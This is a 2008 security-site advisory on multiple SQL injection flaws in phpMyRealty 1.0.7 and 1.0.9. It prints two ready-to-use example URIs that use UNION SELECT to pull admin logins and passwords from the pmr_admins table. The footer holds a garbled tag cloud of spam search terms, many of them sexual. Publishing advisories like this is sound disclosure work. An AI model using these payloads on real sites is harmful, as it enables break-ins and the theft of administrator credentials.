about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , phpMyRealty Multiple SQL Injection Vulnerabilities


Title phpMyRealty Multiple SQL Injection Vulnerabilities
Published 2008-08-27-12:00AM
Updated 2008-08-29-05:34PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  ~!Dok_tOR!~
Vulnerable  phpMyRealty phpMyRealty 1.0.9
phpMyRealty phpMyRealty 1.0.7
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs are available:http://www.example.com/[installdir]/pages.php?id=-999999+union+select+concat_ws(0x3a,login,password),2,3+from+pmr_admins/*http://www.example.com/[installdir]/search.php?price_min=50000&price_max=-999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,login,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+pmr_admins/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 10:18:50 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t379t Vulnerabil news+for+c Assimage Gangbang.c base_dir Wwwsex100. Young girl WWW.BANGBR ftpd dos file%20and pinky xxx t224t /component www.boiiy BUILDING B Www.salo.s Nude ladie Ultimate B apache 1.3 CMPS v2.2. jPortal simbransex bindred ha t830t India sex t830t sexxxxxl dotnuke 1.2.7 Simpleboar TRISHAINBA mambo Remo mambo Remo news for c news for c Bollywood Fuckergirl t224t free india video grat www.sex.ko www.bollyw t10 t www simbu download n haggui-k@y avizoonsex www.teenfo t8t